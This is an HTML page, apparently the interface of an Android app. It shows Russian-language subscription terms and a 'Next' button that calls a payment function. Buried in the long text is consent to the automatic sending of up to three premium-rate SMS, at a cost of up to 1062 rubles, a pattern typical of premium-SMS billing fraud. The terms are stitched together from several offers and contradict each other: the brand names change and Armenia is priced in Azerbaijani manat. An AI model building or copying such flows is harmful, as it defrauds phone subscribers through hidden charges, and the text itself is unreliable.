<!DOCTYPE HTML>
<html>
	<head>
		<title></title>
	
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
		<link type="text/css" href="css/smoothness/jquery-ui-1.8.18.custom.css" rel="stylesheet" />	
		<script type="text/javascript" src="js/jquery-1.7.1.min.js"></script>
		<script type="text/javascript" src="js/jquery-ui-1.8.18.custom.min.js"></script>
		<script type="text/javascript" src="js/jquery-s-0.1.min.js"></script>
		<script type="text/javascript">
			function initData()
			{	
				
				 
				if(androidInfo.match(/operator3/) == 'operator3'  ) 
				{
					$('#exit').css('display' , 'block');
					$('#next-button1').hide();
					$('#next-button2').show();
					
				}
				if(androidInfo.match(/operator5/) == 'operator5'  ) 
				{
					//$('#oferta-div').css('display' , 'none');
				//	$('#oferta-divs').css('display' , 'block');
					
					
				}
			
			}
		</script>
		<style type="text/css">
			*[unselectable=on] {
			    -moz-user-select: none;
			    -o-user-select:none;
			    -khtml-user-select: none;
			    -webkit-user-select: none;
			    -ms-user-select: none;
			     user-select: none;
			}
			body{ font: 90% "Trebuchet MS", sans-serif; margin: 5px;}
			
			.ui-button { width:200px; font-size:20px;}
		</style>	
	</head>
	<body>
		<div id="layout" align="center">	
			<div style="width:100%;background-color:white;bottom:0px;position:fixed;">
				<div align="center" style="padding-top:5px;background-color:white;">
					<a href="javascript:_payment()" class="button ui-state-hover" id="next-button1">Далее</a>
					<a href="javascript:_payment()" class="button ui-state-hover" id="next-button2" style="display:none;">Продолжить</a><br>
				
					<br clear="all">
					<br clear="all">
				
				<div style="display:none;background-color:white;padding-bottom:15px;z-index:10000;" id="exit"><a href="exit.html" style="color:#999999;font-size:19px;">Выход</a></div>
				
				</div>
			
			</div>
					<div id="oferta-divs" align="left" >
			
			
			
			</div>
					
			<div id="oferta-div" align="left">
<p>ПРАВИЛА ПРЕДОСТАВЛЕНИЯ ПОДПИСКИ НА КОНТЕНТ</p>
<p> </p>
<p>Правила предоставления Подписки на Контент (далее по тексту «Правила») разработаны в соответствии с требованиями действующего законодательства Российской Федерации и регулируют отношения по предоставлению Контент-провайдером Абонентам Подписки на Контент.</p>
<p>Настоящие Правила являются публичной офертой и могут быть приняты Абонентом не иначе как путем присоединения к ним в целом. Принять настоящие Правила Абонент может путем осуществления Заказа в порядке, предусмотренном разделом 4 настоящих Правил.</p>
<p></p>
<p>1.	Определения </p>
<p></p>
<p>1.1.	Абонент - абонент (физическое лицо, Корпоративный клиент), с которым Оператором заключен договор на предоставление услуг связи (далее по тексту «Договор») с выделением не менее одного Абонентского номера и/или Уникального кода идентификации.</p>
<p>1.2.	Абонентский номер - телефонный номер, выделяемый Абоненту в соответствии с Договором, с помощью которого производится идентификация Абонентского оборудования с установленной в нем SIM-картой.</p>
<p>1.3.	Абонентское оборудование - подключаемое к сети связи абонентское устройство (абонентская станция) – телефонный аппарат и т.п., - позволяющее передавать и/или принимать информацию, и/или комплектующие и аксессуары к нему.</p>
<p>1.4.	Заказ - действия Абонента, предусмотренные п. 4.1. настоящих Правил, осуществляемые с целью получения доступа к Подписке на Контент.</p>
<p>1.5.	Контент-провайдер - ООО «МосКомСвязь», ОГРН: 1107746426875, 119146, Москва, Комсомольский проспект, д. 7, стр. 2</p>
<p>1.6.	Контентная услуга - дополнительная услуга Оператора, повышающая потребительскую ценность услуг связи, заключающаяся в предоставлении Оператором Абоненту доступа к Подписке на Контент.</p>
<p>1.7.	Корпоративный клиент - Абонент (юридическое лицо или индивидуальный предприниматель), с которым Оператором заключен Договор с выделением не менее одного Абонентского номера и/или Уникального кода идентификации. Корпоративный клиент соглашается, что действия его работников, пользующихся Подпиской на Контент (далее по тексту «Пользователи»), считаются действиями Корпоративного клиента. </p>
<p>1.8.	Оператор - Открытое акционерное общество «Мобильные ТелеСистемы» (г. Москва, ул. Марксистская, д. 4), оказывающее услуги связи на основании лицензий, являющееся стороной по Договору с Абонентом.</p>
<p>1.9.	Стоимость услуги - плата, взимаемая Оператором с Абонента за предоставление Контентной услуги. </p>
<p>1.10.	Уникальный код идентификации - указанное в Договоре уникальное сочетание цифровых, буквенных и/или символьных обозначений, используемое для однозначной идентификации Абонентского оборудования в процессе оказания услуг связи.</p>
<p></p>
<p>2.	Описание Подписки на Контент</p>
<p></p>
<p>2.1.	Контент-провайдер предоставляет Абоненту возможность загрузку программного обеспечения для мобильных устройств с wap сайта.</p>
<p>В случае неполучения от Абонента отказа от Подписки на Контент, срок предоставления Подписки на Контент автоматически продлевается каждый раз на 1 день до момента самостоятельного отключения Абонентом Подписки на Контент.</p>
<p>2.2. Воспользоваться Подпиской на Контент Абонент может с помощью  полученного кода доступа. Абонент вводит на wap-сайте Контент-провайдера полученный код доступа (<динамический код>),   нажимает кнопку «Скачать/Получить контент». Перечень wap-сайтов, на которых предоставляется Подписка на Контент, указан в п. 5 настоящих Правил.</p>
<p>2.3.	Подписка на Контент предоставляется Контент-провайдером. Контентная услуга предоставляется Оператором с использованием оборудования и ресурсов сети Оператора. Ответственность за своевременное и качественное предоставление Подписки на Контент несет Контент-провайдер.</p>
<p></p>
<p>3.	Условия предоставления</p>
<p>3.3.	Контент-провайдер предоставляет Абоненту Подписку на Контент в порядке, предусмотренном настоящими Правилами.</p>
<p>3.4.	Принять настоящие Правила Абонент может путем совершения Заказа. </p>
<p>         Корпоративный клиент считается принявшим настоящие Правила в случае, если один из Пользователей совершает Заказ.</p>
<p>3.5.	Получить Подписку на Контент могут Абоненты, обладающие дееспособностью и правоспособностью, необходимыми для осуществления Заказа в соответствии с требованиями действующего законодательства РФ.</p>
<p>3.6.	Абонент, желающий получить Подписку на Контент, должен располагать оборудованием, необходимым для оформления Заказа, получения Контентной услуги и Подписки на Контент.</p>
<p>3.7.	Осуществляя Заказ, Абонент подтверждает свое согласие с настоящими Правилами, а также подтверждает факт выполнения всех требований, предъявляемых Правилами к Абоненту.</p>
<p>3.8.	Контент-провайдер несет полную ответственность за соответствие Контента действующему законодательству и нормативно-правовым актам Российской Федерации.</p>
<p></p>
<p>4.	 Порядок заказа</p>
<p>4.3.	Для получения доступа к Подписке на Контент Абоненту необходимо совершить следующие последовательные действия:</p>
<p>4.3.1.	На wap- сайте holly-games.com  Контент-провайдера:</p>
<p>•	подтвердить свое ознакомление и согласие с настоящими Правилами; </p>
<p>•	отправить бесплатное SMS-сообщение с соответствующей командой на короткий  номер:</p>
<p>-  для Абонентов ОАО «МТС»: 082+2198 на короткий номер 7887.</p>
<p>-  для абонентов ОАО «ВымпелКом» и ОАО «МегаФон»: «2101<другие указанные на сайте символы>»  (без пробела) на номер 2535.</p>
<p></p>
<p>Для  получения доступа к Подписке на Контент Абонент отправляет Заказ с соответствующей командой на бесплатный короткий номер 7887, тем самым подтверждая согласие на подключение доступа к Подписке на Контент.</p>
<p></p>
<p>•	ввести полученный код доступа на сайте holly-games.com  для открытия доступа к Подписке на Контент.</p>
<p>4.4.	После получения от Абонента Заказа Абоненту направляются SMS-сообщения:</p>
<table border="1px" cellpaddinng=0 cellspacing=0>
    <thead>
        <tr>
            <td>Оператор</td>
            <td>Номер</td>
            <td>Вид сообщения</td>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td>ОАО «МТС»</td>
            <td>МТС/MTSPodpiski/7887/</td>
            <td>
                <p>1.	SMS-сообщение с номера МТС/MTSPodpiski/7887, содержащее информацию о факте подключения и условиях предоставления доступа к Подписке на Контент (Контентной услуги)</p>
                <p>2.	SMS-сообщение с номера 771312, содержащее wap-ссылку/код доступа.</p>
            </td>
        </tr>
        <tr>
            <td>ОАО «ВымпелКом»</td>
            <td>2535/
                Beeline@/
            </td>
            <td>
                <p>1.	SMS-сообщение с номера 2535/Beeline@, содержащее код доступа для предоставления доступа к Подписке на Контент (Контентной услуги)</p>
                <p>2.	SMS-сообщение с номера 2535/Beeline@, содержащее информацию о факте подключения и условиях предоставления доступа к Подписке на Контент (Контентной услуги)</p>
            </td>
        </tr>
        <tr>
            <td>ОАО «Мегафон»</td>
            <td>5051/
                МеgaFonPRO/
            </td>
            <td>
                <p>1.	SMS-сообщение с номера 5051/МеgaFonPRO, содержащее код доступа для предоставления доступа к Подписке на Контент (Контентной услуги)</p>
                <p>2.	SMS-сообщение с номера 5051/МеgaFonPRO, содержащее информацию о факте подключения и условиях предоставления доступа к Подписке на Контент (Контентной услуги)</p>
            </td>
        </tr>
    </tbody>
</table>
<p>4.5.	Выполнение Абонентом указанных в п. 4.1. настоящих Правил действий означает согласие Абонента на получение Контентной услуги в соответствии с заявленными Оператором условиями, на получение выбранной Абонентом Подписки на Контент в соответствии с заявленными Контент-провайдером условиями, на передачу данных, идентифицирующих Абонента (в частности, номера мобильного телефона Абонента) третьим лицам, привлекаемым Контент-провайдером для оказания Подписки на Контент, а также на получение бесплатных SMS-сообщений, напоминающих Абоненту о содержании, стоимости, порядке отказа от предоставления Контентной услуги.</p>
<p></p>
<p>5. Перечень wap - сайтов </p>
<p></p>
<p>5.1.	URL сайта </p>
<p>holly-games.com</p>
<p></p>
<p>6. Порядок отключения</p>
<p></p>
<p>6.1.	Отключить Подписку на Контент можно посредством отключения Контентной услуги, одностороннего отказа от ее получения.</p>
<p>6.2.	Отключение Контентной услуги осуществляется Абонентом самостоятельно:</p>
<p></p>
<p>Для абонентов ОАО «МТС»:</p>
<p>1)	с помощью интерфейсов, определенных Оператором. Подробнее об интерфейсах для отказа от получения такой услуги можно узнать на сайте Оператора www.mts.ru в разделе «Услуги по коротким номерам», на портале «Мои подписки» http://moipodpiski.mts.ru, или позвонив по единому номеру 88002500890.</p>
<p>2)	при Отправке ussd-команды *152*2#вызов (сообщение бесплатно для Абонента). </p>
<p>3)	при отправке сообщения на 6-ти-значный МО-номер 771312 (сообщение бесплатно для Абонента): </p>
<p>- при отправке Абонентом бесплатного сообщения на 6-ти-значный МО-номер 771312 с командой СТОП (STOP, stop, стоп, Стоп и т.п.) происходит прекращение оказания всех Контентных услуг, при предоставления которых используется 6-ти-значный МО-номер 771312.</p>
<p>- при отправке Абонентом бесплатного сообщения на 6-ти-значный МО-номер 771312 с командой, содержащей в т. ч. слово «СТОП», происходит прекращение предоставления Подписки на Контент, соответствующей данной команде.</p>
<p></p>
<p>Для абонентов ОАО «ВымпелКом»:</p>
<p>1)	при отправке сообщения на МО-номер 2535 (сообщение бесплатно для Абонента): </p>
<p>- при отправке Абонентом бесплатного сообщения на МО-номер 2535 с командой СТОП (STOP, stop, стоп, Стоп и т.п.) происходит прекращение оказания всех Контентных услуг, при предоставления которых используется МО-номер 2535.</p>
<p></p>
<p>Для абонентов ОАО «Мегафон»:</p>
<p>1)	при отправке сообщения на МО-номер 5051 (сообщение бесплатно для Абонента): </p>
<p>- при отправке Абонентом бесплатного сообщения на МО-номер 5051 с командой, содержащей в т. ч. слово «СТОП» происходит прекращение предоставления Подписки на Контент, соответствующей данной команде.</p>
<p></p>
<p>Для Абонентов ОАО «МТС», ОАО «ВымпелКом», ОАО «Мегафон»:</p>
<p>а) На странице «Управления подпиской» holly-games.com, введя свой номер и нажав кнопку «Отписаться».</p>
<p>б) Связавшись со Службой Поддержки Контент-провайдера по тел.: 88001005410 (в режиме 24/7), или заявку можно оставить на сайте www.inhelp.org</p>
<p></p>
<p></p>
<p>6.3.	Односторонним отказом Абонента от получения Контентной услуги считается нахождение Абонента в блокировке более 30 календарных дней. </p>
<p></p>
<p>7.	Стоимость и порядок оплаты</p>
<p>7.1.	Стоимость Подписки на Контент составляет 20 рублей с НДС за 1 календарный день для Абонентов ОАО «МТС», ОАО «ВымпелКом», ОАО «Мегафон».</p>
<p>7.2.	Для Абонентов ОАО «МТС» с порядком списания Стоимости услуги дополнительно можно ознакомиться на Сайте Оператора www.mts.ru в разделе «Услуги по коротким номерам», введя короткий номер или идентификатор услуги в строке поиска, а также позвонив по единому номеру 88002500890.</p>
<p></p>
<p>8.	Ограничения</p>
<p>8.1.	В случае если Абонентское оборудование Абонента не поддерживает формат, необходимый для воспроизведения или просмотра Контента, предоставление Подписки на Контент не гарантируется.</p>
<p>8.2.	Абонент вправе использовать Контент только в личных целях и не использовать для распространения путем продажи или иного отчуждения Контента третьим лицам. Использование Абонентом Подписки на Контент в целях распространения Контента третьим лицам нарушает законодательство РФ об интеллектуальной собственности и влечет для Абонента предусмотренную законодательством ответственность. Контент-провайдер не несет ответственности за противоправные действия Абонента. </p>
<p>8.3.	Принимая настоящие Правила, Абонент соглашается с вышеуказанными ограничениями при предоставлении Подписки на Контент.</p>
<p>В случае нежелания Абонента пользоваться Подпиской на Контент с ограничениями, указанными в настоящих Правилах, Абонент вправе отключить Подписку на Контент в порядке, указанном в разделе 6 настоящих Правил. </p>
<p></p>
<p>9.	Прочие условия</p>
<p>9.1.	Для Абонентов ОАО «МТС»: </p>
<p>В процессе предоставления Контент-провайдером Абоненту Подписки на Контент Оператор осуществляет соответствующее информирование Абонента об условиях предоставления Контентной услуги посредством отправки SMS-сообщений с номера МТС/MTSPodpiski/7887. </p>
<p>9.2.	Прекращение предоставления Контентной услуги влечет прекращение предоставления Подписки на Контент.</p>
<p>9.3.	В случае отказа Абонента от предоставления Контентной услуги предоставление Подписки на Контент производится только после повторного выполнения Абонентом Заказа.</p>

			
			<br>
<br>
<br>
	
Пользовательское соглашение<br>
	Для получения доступа к контенту вы должны согласиться с условиями, представленными ниже.<br>
	Ниже представлен текст соглашения-оферты между сервисом http://gydata1.net и Абонентом.<br>
	Лицензионное соглашение (основные положения).<br>
	Продолжение процесса установки программного продукта означает ваше согласие с правилами, имеющими силу публичной оферты (ст. 437 Гражданского кодекса Российской Федерации), текст которых опубликован ниже (содержит основные положения Правил; полный текст правил доступен по следующему URL-адресу: http://tosmobiles.net/oferta.php<br>
	Настоящий программный продукт, загружаемый Вами на абонентское устройство, включая любые официальные дополнения к нему, является результатом интеллектуальной деятельности, охраняемым в соответствии с гражданским законодательством Российской Федерации или нормами применимого законодательства соответствующих иностранных государств (для пользователей сетей подвижной радиотелефонной связи иностранных государств). Настоящий программный продукт предоставляется Вам (конечному пользователю) по не исключительной лицензии на настоящих условиях. Программный продукт предоставляется на возмездной основе. Программный продукт является инсталляционным модулем («приложением»), обеспечивающим доступ к сервисам интернет-ресурса http://gydata1.net. Интернет-ресурс http://gydata1.net является сервисом обмена файлами и ссылками на файлы-приложения для абонентских станций (мобильных телефонов, коммуникаторов и иных аналогичных устройств, работающих под управлением операционных систем, поддерживающих выполнение скриптов Java2me, а также Android). Сервис позволяет абоненту после регистрации на интернет-ресурсе без ограничений использовать функции поиска и загрузки приложений для абонентских станций. Оферент гарантирует одновременную доступность на сайте не менее 25 приложений и не менее 10 активных URL-ссылок на файлы, расположенные на других файловых хранилищах или иных аналогичных web-площадках, имеющих потребительскую ценность по заключению отдела маркетинга оферента. Регистрация на указанном сервисе производится путём установки на абонентскую станцию настоящего программного продукта, который в процессе инсталляции (установки) производит обмен сообщениями электросвязи с цифровыми идентификаторами (сервисными номерами) сети вашего оператора. В процессе регистрации Вас в качестве пользователя сервиса производится отправка до трёх сообщений электросвязи на цифровые идентификаторы, имеющие premium-тарификацию. Устанавливая и используя настоящий программный продукт, Вы даёте оференту согласие на, в том числе, передачу в тексте отправляемых на цифровые идентификаторы сообщений электросвязи сведений о технических параметрах используемой Вами абонентской станции с целью дальнейшего предоставления Вам совместимых приложений или ссылок на совместимые приложения. В процессе установки может производиться соединение со следующими цифровыми идентификаторами (в зависимости от общей нагрузки на соответствующие цифровые идентификаторы): 6151, 7151, 8151, 9151, 2858, 2855, 7155, 3858, 3855, 7255. Стоимость услуги (лицензии на один экземпляр программного продукта) составляет 1062 рублей (включая НДС). В случае, если в процессе установки производится соединение с цифровыми идентификаторами меньшей стоимости, оферент предоставляет пользователю скидку в размере разницы между стоимостью услуги и общей стоимостью установленных соединений между Модулем SIM абонента и цифровыми идентификаторами. Для абонентов ОАО «МегаФон» услуга предоставляется после успешной тарификации соединения, установленного между модулем SIM абонента и одним цифровым идентификатором сети ОАО «МегаФон» из перечисленных в настоящей оферте. Сумма скидки предоставляется на каждую лицензию, выплате в денежной форме не подлежит. Абонентам оператораTele2 услуга не предоставляется. Пожалуйста, подробно ознакомьтесь с полным текстом публичной оферты до использования сервиса! http://tosmobiles.net/oferta.php<br>
	<br>
	1. Администрация http://gydata1.net не несет никакой ответственности за любой прямой или косвенный ущерб, возникший в результате использования приложения, включая упущенную прибыль и понесенные убытки.<br>
	<br>
	2. При первом запуске приложений http://gydata1.net запрашивается разрешение на передачу регистрационных данных с использованием короткого номера.<br>
	<br>
	3. Пользователь вправе отказать в передаче регистрационных данных. В таком случае приложения http://gydata1.net остаются неактивированными.<br>
	<br>
	4. Администрация http://gydata1.net не несет никакой ответственности за содержание приложений, доступ к которым оплачивается через приложение http://gydata1.net.<br>
	<br>
	5. Для получения доступа, к предоставляемому сервисом http://gydata1.net контенту, необходимо произвести оплату:<br>
	<br>
	<br>
	Для Таджикистана:<br>
	Стоимость любого исходящего SMS-сообщения на номер 3020 - 2,00 USD. Билайн - 1,00 USD. Тариф с учётом НДС. <br>
	Услуга предоставляется для совершеннолетних абонентов всех национальных GSM-операторов<br>
		<br>
	Для Азербайджана:<br>
	Абонентам предоставляется платный доступ к архиву загрузок<br>
	Отправка до 3-х СМС-сообщений на сервисные номера<br>
	Сервис доступен на всей территории Азербайджана<br>
	<br>
	Стоимость любого исходящего SMS-сообщения на номер 9095 0.41 AZN для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9337 2.36 AZN для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9385 5 AZN для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9520 0.9 AZN для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9535 7.8 AZN для абонентов всех Операторов включая НДС.<br>
	<br>
	Для Армении:<br>
	Абонентам предоставляется платный доступ к архиву загрузок<br>
	Отправка до 3-х СМС-сообщений на сервисные номера<br>
	Сервис доступен на всей территории Армении<br>
	<br>
	Стоимость любого исходящего SMS-сообщения на номер 1357 150 AMD для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 2468 290 AMD для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 3579 490 AMD для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 4680 990 AMD для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9535 7.8 AZN для абонентов всех Операторов включая НДС.<br>
	<br>
	<br>
		Для Беларуси:<br>
Абонентам предоставляется платный доступ к архиву загрузок<br>
Отправка до 1-х СМС-сообщений на сервисные номера<br>
Сервис доступен на всей территории Белоруси<br>
Стоимость любого исходящего SMS-сообщения на номер 3310 47880 руб. (BYR) для абонентов всех Операторов, включая НДС<br>

	<br>
	Для Казахстана:<br>
	Абонентам предоставляется платный доступ к архиву загрузок<br>
	Отправка до 1-х СМС-сообщений на сервисные номера<br>
	Сервис доступен на всей территории Казахстана<br>
		<br>
	Стоимость любого исходящего SMS-сообщения на номер 9682 999 KZT для абонентов всех Операторов (кроме Оператора Beeline – 700 KZT) включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9683 600 KZT для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9684 199 KZT для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 9685 449 KZT для абонентов всех Операторов включая НДС.<br>
	<br><br>Для Киргизии:
<br>Отправка до 3 смс на короткие номера 3060, 3050, 3040, 3010
 <br>
<br>Для Молдовы:
<br>Отправка до 3 смс на короткие номера 3353, 3323, 3033
<br>
<br>
Полную информацию о тарифах вы можете получить на веб-сайте: http://sms911.ru/<br>

	Для Латвии:<br>
	Абонентам предоставляется платный доступ к архиву загрузок<br>
	Отправка до 1-х СМС-сообщений на сервисные номера<br>
	Сервис доступен на всей территории Латвии<br>
		<br>
	Стоимость любого исходящего SMS-сообщения на номер 144 0.97 LVL для абонентов всех Операторов включая НДС.<br>
<br>
	Для Литвы:<br>
	Абонентам предоставляется платный доступ к архиву загрузок<br>
	Отправка до 1-х СМС-сообщений на сервисные номера<br>
	Сервис доступен на всей территории Литвы<br>
		<br>
	Стоимость любого исходящего SMS-сообщения на номер 1394 10 LTL для абонентов всех Операторов включая НДС.<br>
<br>
	Для Эстонии:<br>
	Абонентам предоставляется платный доступ к архиву загрузок<br>
	Отправка до 1-х СМС-сообщений на сервисные номера<br>
	Сервис доступен на всей территории Эстонии<br>
		<br>
	<br>
	Стоимость любого исходящего SMS-сообщения на номер 14401 1 EUR для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 14403 3 EUR для абонентов всех Операторов включая НДС.<br>
	Стоимость любого исходящего SMS-сообщения на номер 14405 5 EUR для абонентов всех Операторов включая НДС.<br>
	<br>
	<br>
	При возникновении вопросов, связанных с работоспособностью сервиса, следует обращаться в службу поддержки: http://g911.ru<br>
	tosmobiles.net не несет ответственности за сбои в работе операторов сотовой связи.<br>
	После отправки SMS, Вы даёте своё согласие получать SMS уведомления от компании tosmobiles.net.<br>
	Факт пользования сервисом подразумевает согласие пользователя с настоящими условиями<br>
	tosmobiles.net оставляет за собой право вносить любые изменения и/или дополнения в настоящие правила в период оказания услуг пользователям.

	<br>

Для Украины:<br>
Доступ представляется посредством оплаты через смс. Тарифы на приобретение доступа:<br>
9101 - 7 грн<br>
9102 - 15 грн<br>
9103 - 25 грн<br>
9106 - 50 грн<br><br>

	Для России:<br>
	<br>
	Отправка до 3-х СМС-сообщений на сервисные номера:<br>
	<br>
	 - 7151 (МТС 33.87 руб., Мегафон 40.00 руб., Билайн 40.00 руб., Tele2 40.12 руб., СМАРТС 40 руб., около 40 руб. с НДС для остальных операторов) включая НДС.<br>
 - 8151 (МТС 101.6 руб. , Билайн 100.01 руб., Мегафон 101.48руб., Tele2 83.78 руб., СМАРТС 84 руб., около 100 руб. с НДС для остальных операторов) включая НДС.<br>
 - 9151 (МТС 101.60 руб., Билайн 130.00 руб., Мегафон 135.00 руб., Tele2 125.08 руб., СМАРТС 125 руб., около 130 руб. с НДС для остальных операторов) включая НДС.<br>
 - 2855 (МТС 203.20 руб., Билайн 200.00 руб., Мегафон 236.00руб., Tele2, СМАРТС 236.00 руб., около 230 руб. с НДС для остальных операторов) включая НДС.<br>
 - 2858 (МТС 203.20 руб., Мегафон 200.60 руб., Билайн 200.00 руб., Tele2, СМАРТС 200.60 руб., около 200 руб. с НДС для остальных операторов) включая НДС.<br>
 - 7155 (МТС 240.00 руб., Мегафон 236.00 руб., Билайн 200.00 руб., Tele2, СМАРТС 236.00 руб., около 240 руб. с НДС для остальных операторов) включая НДС.<br>
 - 7255 (МТС 304.79 руб., Мегафон 300.00 руб., Билайн 300.00 руб., Tele2 249.99 руб., СМАРТС 300 руб., около 300 руб. с НДС для остальных операторов) включая НДС.<br>
	<br>
	Отправка до 2-х СМС-сообщений на сервисный номер:<br>
	<br>
	- 3855 ( Мегафон 354.00руб., Билайн 300.00 руб., МТС 304.79  руб., Tele2 249.99 руб., около 300 руб. с НДС для остальных операторов) включая НДС.<br>
	- 3858 ( Мегафон 300.00руб., Билайн 300.00 руб., МТС 304.79 руб., Tele2 249.99 руб., около 300 руб. с НДС для остальных операторов) включая НДС.<br>
	<br>
	Общая стоимость услуги составляет не более 600 рублей<br>
	Стоимость услуг для абонентов МегаФон не превышает 354 рубля<br>
	<br>
	Для оператора МТС, Билайн и Мегафон услуга оказывается после отправки 1 смс<br>
	<br>
	Для оператора ЕТК:<br>
	1151 - Енисей Телеком 41.30 руб. (RUR) с НДС<br>
	1161 - Енисей Телеком 112.10 руб. (RUR) с НДС<br>
	1899 - Енисей Телеком 76.70 руб. (RUR) с НДС<br>
	4481 - Енисей Телеком 270.00 (RUR) с НДС<br>
	2855 - Енисей Телеком 236 руб. (RUR) с НДС<br>
	7781 - Енисей Телеком 171.10 руб. (RUR) с НДС<br>
	9151 - Енисей Телеком 125.08 руб. (RUR) с НДС<br>
	7151 - Енисей Телеком 40.12 руб. (RUR) с НДС<br>
	<br>
	
	Услуга платная. Для получения одноразового доступа к услуге, необходимо отправить 1 смс сообщение на платный короткий номер.<br>
<br>
<br>Для Азербайджана:
<br>Отправка смс на короткий номер 9853, стоимость 7 манат для абонентов Азерселл
<br>
<br>Для Молдавии:
<br>Отправка смс на короткий номер 7250, стоимость 33,00 MDL с НДС
<br>
<br>Для Беларуси:
<br>Отправка смс на короткий номер 3312, стоимость 29900 BYR (35880 BYR с НДС) для абонентов всех операторов.


<br>
Стоимость любого исходящего SMS-сообщения с учетом НДС для абонентов МТС:<br>
на номер 4481 составляет 305р;<br>
на номер 7781 составляет 183р; <br>
на номер 4016 составляет 150р; <br>
на номер 1151 составляет 43р; <br>
на номер 4015 составляет 100р;<br>
<br>
Стоимость любого исходящего SMS-сообщения с учетом НДС для абонентов МЕГАФОН:<br>
на номер 4481 составляет 300р;<br>
на номер 7781 составляет 177р; <br>
на номер 4016 составляет 150р; <br>
на номер 1151 составляет 41р; <br>
на номер 4015 составляет 100р;<br>
<br>
Точную стоимость всех номеров для всех операторов вы можете посмотреть по ссылке : http://7hlp.com/ .<br>
Служба поддержки http://7hlp.com/ или по номеру телефона 8-800-100-73-37.
	6. В случае обнаружения спама или иных запрещенных методов распространения приложений, Администрация просит уведомлять о таких случаях в Службу поддержки Абонентов : me.s.mobile@gmail.com.<br>
	<br>
	<br>
	7. Абонент вправе обжаловать процедуру списания средств со счета в случаях, если заявленных в названии и описании контент не был предоставлен после успешной активации приложения.<br>
	<br>
	Для этого необходимо обратиться в Службу поддержки Абонентов по почте: me.s.mobile@gmail.com.<br>
	<br>
	<br>
	Для активации приложения необходимо разрешить отправку запроса с использованием платного короткого номера.<br>
	<br>
	<br>
	Полную информацию о тарифах вы можете получить на веб-сайте: http://sms911.ru/<br>
	<br /><br />
		Лицензионное соглашение (основные положения).
		<p class="block">
				Продолжение процесса установки программного продукта означает ваше согласие с правилами, имеющими силу публичной оферты (ст. 437 Гражданского кодекса Российской Федерации), текст которых опубликован ниже (содержит основные положения Правил; полный текст правил доступен по следующему URL-адресу: <a href="http://tosmobiles.net/oferta.php?full">http://tosmobiles.net/oferta.php?full</a>
		</p>
		<p class="block">
			Настоящий программный продукт, загружаемый Вами на абонентское устройство, включая любые официальные дополнения к нему, является результатом интеллектуальной деятельности, охраняемым в соответствии с гражданским законодательством Российской Федерации или нормами применимого законодательства соответствующих иностранных государств (для пользователей сетей подвижной радиотелефонной связи иностранных государств). Настоящий программный продукт предоставляется Вам (конечному пользователю) по не исключительной лицензии на настоящих условиях. Программный продукт предоставляется на возмездной основе. Программный продукт является инсталляционным модулем («приложением»), обеспечивающим доступ к сервисам интернет-ресурса tosmobiles.net. Интернет-ресурс tosmobiles.net является сервисом обмена файлами и ссылками на файлы-приложения для абонентских станций (мобильных телефонов, коммуникаторов и иных аналогичных устройств, работающих под управлением операционных систем, поддерживающих выполнение скриптов Java2me, а также Android). Сервис позволяет абоненту после регистрации на интернет-ресурсе без ограничений использовать функции поиска и загрузки приложений для абонентских станций. Оферент гарантирует одновременную доступность на сайте не менее 25 приложений и не менее 10 активных URL-ссылок на файлы, расположенные на других файловых хранилищах или иных аналогичных web-площадках, имеющих потребительскую ценность по заключению отдела маркетинга оферента. Регистрация на указанном сервисе производится путём установки на абонентскую станцию настоящего программного продукта, который в процессе инсталляции (установки) производит обмен сообщениями электросвязи с цифровыми идентификаторами (сервисными номерами) сети вашего оператора. В процессе регистрации Вас в качестве пользователя сервиса производится отправка до трёх сообщений электросвязи на цифровые идентификаторы, имеющие premium-тарификацию. Устанавливая и используя настоящий программный продукт, Вы даёте оференту согласие на, в том числе, передачу в тексте отправляемых на цифровые идентификаторы сообщений электросвязи сведений о технических параметрах используемой Вами абонентской станции с целью дальнейшего предоставления Вам совместимых приложений или ссылок на совместимые приложения. В процессе установки может производиться соединение со следующими цифровыми идентификаторами (в зависимости от общей нагрузки на соответствующие цифровые идентификаторы): 6151, 7151, 8151, 9151, 2858, 2855, 7155, 3858, 3855, 7255. Стоимость услуги (лицензии на один экземпляр программного продукта) составляет 1062 рублей (включая НДС). В случае, если в процессе установки производится соединение с цифровыми идентификаторами меньшей стоимости, оферент предоставляет пользователю скидку в размере разницы между стоимостью услуги и общей стоимостью установленных соединений между Модулем SIM абонента и цифровыми идентификаторами. Для абонентов ОАО «МегаФон» услуга предоставляется после успешной тарификации соединения, установленного между модулем SIM абонента и одним цифровым идентификатором сети ОАО «МегаФон» из перечисленных в настоящей оферте. Сумма скидки предоставляется на каждую лицензию, выплате в денежной форме не подлежит. Абонентам оператораTele2 услуга не предоставляется. Пожалуйста, подробно ознакомьтесь с полным текстом публичной оферты до использования сервиса! <a href="http://tosmobiles.net/oferta.php?full">http://tosmobiles.net/oferta.php?full</a>
		</p>
			
			</div>
			<br>
<br>
<br>
<br>
<br>
<br>

		
				
		</div>
	</body>
</html>